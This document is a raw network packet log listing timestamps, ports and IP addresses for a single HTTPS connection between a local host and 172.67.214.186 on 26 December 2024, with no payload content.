Dec 26, 2024 18:26:46.457055092 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.457113981 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.457119942 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.457146883 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.457173109 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.464399099 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.464440107 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.464482069 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.464487076 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.464514017 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.464540958 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.471540928 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.471563101 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.471606016 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.471611023 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.471640110 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.471673965 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.478852987 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.478878975 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.478921890 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.478925943 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.478955030 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.478981972 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.486896992 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.486917973 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.486974001 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.486979961 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.487030029 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.647058964 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.647085905 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.647156954 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.647162914 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.647197962 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.647217989 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.653294086 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.653315067 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.653362989 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.653367043 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.653409958 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.653436899 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.660640001 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.660660028 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.660705090 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.660710096 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.660729885 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.660754919 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.668240070 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.668267965 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.668322086 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.668327093 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.668376923 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.668416977 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.674731016 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.674751043 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.674817085 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.674823046 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.674870968 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.682631016 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.682658911 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.682701111 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.682706118 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.682733059 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.682754040 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.689215899 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.689237118 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.689284086 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.689292908 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.689311981 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.689338923 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.697788954 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.697809935 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.697869062 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.697874069 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.697920084 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.856604099 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.856626987 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.856712103 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.856719017 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.856729031 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.856762886 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.864005089 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.864027977 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.864104986 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.864109993 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.864166021 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.871534109 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.871550083 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.871614933 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.871619940 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.871682882 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.878025055 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.878043890 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.878092051 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.878098011 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.878127098 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.878148079 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.885529995 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.885545969 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.885628939 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.885633945 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.885695934 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.892534018 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.892563105 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.892612934 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.892621040 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.892651081 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.892683983 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.899894953 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.899919987 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.899996042 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.900002003 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.900047064 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.907926083 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.907954931 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.908021927 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.908027887 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.908070087 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.371345997 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.371359110 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.371401072 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.371505022 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.371515989 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.371547937 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.371551037 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.371579885 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.371614933 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.372555971 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.372572899 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.372602940 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.372632027 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.372643948 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.372658014 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.372680902 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.372718096 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.373749971 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.373766899 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.373822927 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.373826981 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.373871088 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.374891996 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.374908924 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.374955893 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.374959946 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.374999046 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.375369072 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.375386000 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.375416040 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.375425100 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.375428915 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.375469923 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.375570059 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.377120018 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.377135992 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.377171993 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.377190113 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.377196074 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.377227068 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.377270937 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.377424955 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.377468109 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.378329039 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.378345966 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.378371954 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.378398895 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.378403902 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.378434896 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.378473997 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.379278898 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.379384995 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.379400015 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.379462004 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.379466057 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.379513025 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.380937099 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.380953074 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.381009102 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.381012917 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.381055117 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.381093025 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.381455898 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.381469011 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.381531000 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.381535053 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.381577969 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.382144928 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.382162094 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.382200956 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.382205963 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.382235050 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.382253885 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.383058071 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.383291960 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.383306980 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.383362055 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.383366108 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.383407116 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.387873888 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.391680956 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.491796970 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.491858959 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.491910934 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.491919994 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.491947889 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.491971016 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.499166012 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.499228954 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.499249935 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.499254942 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.499284983 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.499305964 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.505693913 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.505772114 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.505773067 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.505801916 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.505841970 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.505858898 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.513114929 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.513161898 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.513212919 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.513217926 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.513267994 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.520519018 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.520560980 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.520612001 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.520617008 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.520648003 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.520680904 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.527569056 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.527611017 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.527641058 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.527646065 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.527704954 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.534960032 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.535001993 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.535038948 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.535043955 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.535070896 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.535089970 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.542973042 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.543015957 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.543054104 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.543060064 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.543083906 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.543103933 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.701976061 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.702042103 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.702068090 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.702076912 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.702105999 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.702127934 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.709132910 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.709167004 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.709208012 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.709212065 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.709232092 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.709258080 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.716145039 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.716176987 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.716217041 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.716221094 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.716245890 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.716264963 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.722342014 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.722372055 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.722433090 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.722436905 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.722477913 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.729511976 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.729542017 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.729579926 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.729583979 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.729594946 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.729628086 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.736202002 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.736232996 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.736268997 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.736272097 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.736298084 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.736315966 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.743519068 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.743556023 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.743592024 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.743596077 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.743621111 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.743639946 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.753395081 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.753421068 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.753463030 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.753467083 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.753492117 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.753506899 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.912807941 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.912870884 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.912928104 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.912940979 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.912966013 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.912986994 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.919882059 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.919926882 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.919960022 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.919964075 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.919992924 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.920017004 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.927083015 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.927144051 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.927160025 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.927165985 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.927213907 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.933300972 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.933415890 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.933592081 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.933598042 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.933650017 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.940402031 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.940458059 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.940474987 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.940479994 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.940534115 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.947223902 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.947267056 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.947297096 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.947300911 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.947329044 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.947356939 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.954638958 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.954680920 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.954710960 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.954715014 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.954740047 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.954761982 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.964514017 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.964555979 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.964601994 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.964607000 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:47.964651108 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:47.964675903 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.123672009 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.123754025 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.123780012 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.123788118 CET	443	49719	172.67.214.186	192.168.2.16
